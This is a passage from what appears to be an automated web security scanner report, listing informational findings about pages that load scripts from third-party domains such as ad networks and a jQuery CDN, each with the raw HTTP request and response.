<meta name="copyright" content="Equifax" />
<meta name="descripti
...[SNIP]...
<!-- End Google Analytics Tag -->

<script src="http://equfx.netmng.com/?aid=089&tax=search" type="text/javascript" defer="defer"></script>
...[SNIP]...

24.132. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /activityi;src=2769103;type=tui-t329;cat=truec214;ord=1;num=9268942088820.041? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 25 Apr 2011 00:34:25 GMT
Expires: Mon, 25 Apr 2011 00:34:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2855

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IMG SRC="http://bp.
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<img src="http://b.collective-media.net/seg/rt/truecredit2" width="1" height="1" /><script src="https://segment-pixel.invitemedia.com/pixel?pixelID=57305&pixelID=57306&pixelID=57307&pixelID=57308&pixelID=57309&pixelID=57310&pixelID=57311&partnerID=272&clientID=5399&key=segment&returnType=js"></script>
...[SNIP]...

24.133. http://forums.silverlight.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Fri, 22 Apr 2011 08:37:02 GMT; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; expires=Mon, 23-Apr-2012 15:56:51 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; expires=Mon, 23-Apr-2012 15:56:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; path=/; HttpOnly
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:16:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:52 GMT
Content-Length: 62485


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head id="ctl00_ctl00"
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

24.134. http://forums.silverlight.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/default.aspx%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:55 GMT; expires=Mon, 23-Apr-2012 15:56:55 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:16:55 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:55 GMT
Content-Length: 62485


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head id="ctl00_ctl00"
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

24.135. http://forums.silverlight.net/forums/13.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/13.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/13.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:54 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:59 GMT; expires=Mon, 23-Apr-2012 15:56:59 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:16:59 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:59 GMT
Content-Length: 73658


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Instal
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

24.136. http://forums.silverlight.net/forums/17.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/17.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/17.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:58 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:01 GMT; expires=Mon, 23-Apr-2012 15:57:01 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:17:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:01 GMT
Content-Length: 77618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Progra
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

24.137. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/TopicsNotAnswered.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/TopicsNotAnswered.aspx?ForumID=-1 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:00 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:05 GMT; expires=Mon, 23-Apr-2012 15:57:05 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:17:05 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:05 GMT
Content-Length: 73491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Thread
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

24.138. http://forums.silverlight.net/forums/p/226774/548773.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/p/226774/548773.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/p/226774/548773.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:58:27 GMT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 12:01:29 GMT; expires=Mon, 23-Apr-2012 16:01:29 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:21:29 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:01:30 GMT
Content-Length: 25404


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

24.139. http://forums.silverlight.net/forums/t/226774.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/226774.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/t/226774.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:03 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 12:01:17 GMT; expires=Mon, 23-Apr-2012 16:01:17 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:21:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:01:18 GMT
Content-Length: 25379


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Silver
...[SNIP]...
<link rel="stylesheet" media="print" type="text/css" href="http://i2.silverlight.net/resources/style/print.css?cdn_id=12152010" />
<script src="http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...

24.140. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681828&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663828367&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663828373&frm=1&adk=2614322350&ga_vid=2143277132.1303663828&ga_sid=1303663828&ga_hid=1947261372&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:50:25 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1832

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=e0ykNJvH5j97TKQ0m8fmPwAAAEAzMwdAe0ykNJvH5j97TKQ0m8fmP4tkw7_c_Kt8SsYda6b2ziXRVLRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA8A4BAgUCAAQAAAAA8SX3XQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303663852%29%3Buf%28%27c%27%2C+52368%2C+1303663852%29%3Buf%28%27r%27%2C+173254%2C+1303663852%29%3Bppv%288991%2C+%278983551906760844427%27%2C+1303663852%2C+1303707052%2C+52368%2C+25553%29%3B&cnd=!XRBRyQiQmQMQxskKGAAg0ccBKEsxQyNyhZvH5j9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbRU0QAHEu4K5XcWI-pL1bVUGxfbDqNZCZfoaA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuDo_0VS0Te6lHJbulQfVl6mfAtfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCWsACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwKw2NSpsBuz7_grX_7oWb99Jw51w%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.141. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679668&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661668578&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661668584&frm=1&adk=2614322350&ga_vid=1392256269.1303661669&ga_sid=1303661669&ga_hid=1543420627&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=10 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:14:25 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25474489&ahcid=640462&bimpd=rGlAMYkRYgBRpI3DsEuPf0p5a05qIN5ID27vxZrUyIIAVSEwwAku2_b46UOv89GJdtysiIP26yS7s8I3pAc0T69niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BH3iX1ZfkEPugt72CmK04CyGDOWIWwtpfKu6Yb9nPGUMhtlfbsVT-wOwKJBNR3jwWTazV0AvbMQZNLntaOeKl1p3e0zVN6loNyK4c_OoCgom8jpD4tX7Nxwn2-BtKmkq7LmKEOeK4ZAoWfwI8SCWgb1j-Ezh3q9PALHUe6oayQIztC8cnfVoc-ffY0bjr9ypPr7vVxLo4SQGNqr6znxbeBigsLTxdpnye91zCQ7JsBxbrg3DoDCmL2ffRtSVuJNqJgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeuZcgF_uJfsdRlJrg2l5qBJ5nm0lTjSklndxOrj4-IjIX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfqhdNCAXgSonD4Wtmpte-DfH3NngsQiO9YMiN-l9OgnK6Lhd38O4b4WbBWengTve4vt_T370WDWWY1SqEwEJwbhoHTLamDrAmQq2DYIVNCf6VQGYjf1QW3f3F61FH8ZW8ZA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRMYQAJruAK5XuOMNsX5PLWU3C0EJg3YP6boA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBUe3MYUy0TeDdJo73lQfkr-yGA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbClYHu9567sukB%26num%3D1%26sig%3DAGiWqtxTMQzv5gNUN0_08G60ytFBJ7xwdw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.142. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680301&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662301770&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303662301772&frm=1&adk=2614322350&ga_vid=1987845434.1303662302&ga_sid=1303662302&ga_hid=1938999785&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=4 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
